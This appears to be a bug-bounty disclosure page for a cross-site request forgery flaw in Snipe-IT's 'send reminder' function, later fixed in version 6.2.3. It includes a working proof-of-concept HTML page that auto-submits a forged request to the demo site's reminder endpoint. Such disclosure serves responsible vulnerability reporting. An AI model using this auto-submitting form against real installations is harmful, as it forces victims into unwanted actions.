CSRF in Send Reminder in snipe/snipe-it

Valid

Reported on

Oct 7th 2023


Description

CSRF in Send Reminder

Proof of Concept

1 .Attacker sent form fake to victim

<html>
   <body>
     <form action="https://demo.snipeitapp.com/reports/unaccepted_assets/4/sent_reminder">
       <input type="submit" value="Submit request" />
       </form>
       <script>
         history.pushState('', '', '/');
         document.forms[0].submit();
       </script>
     </body>
   </html>

2 .Victim click, execute send reminder unexpected

Video Poc

https://drive.google.com/file/d/1ei_bfxIbACA6DWObg2bjZjJBiqTPlwWd/view?usp=sharing

Impact

trick users into performing unwanted actions

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 5 months ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 5 months ago
snipe validated this vulnerability 5 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
snipe marked this as fixed in v.6.2.3 with commit 6d55d7 5 months ago
snipe has been awarded the fix bounty
HaiNguyen
5 months ago

Researcher


oke, thank you.

This vulnerability has now been published 4 months ago
to join this conversation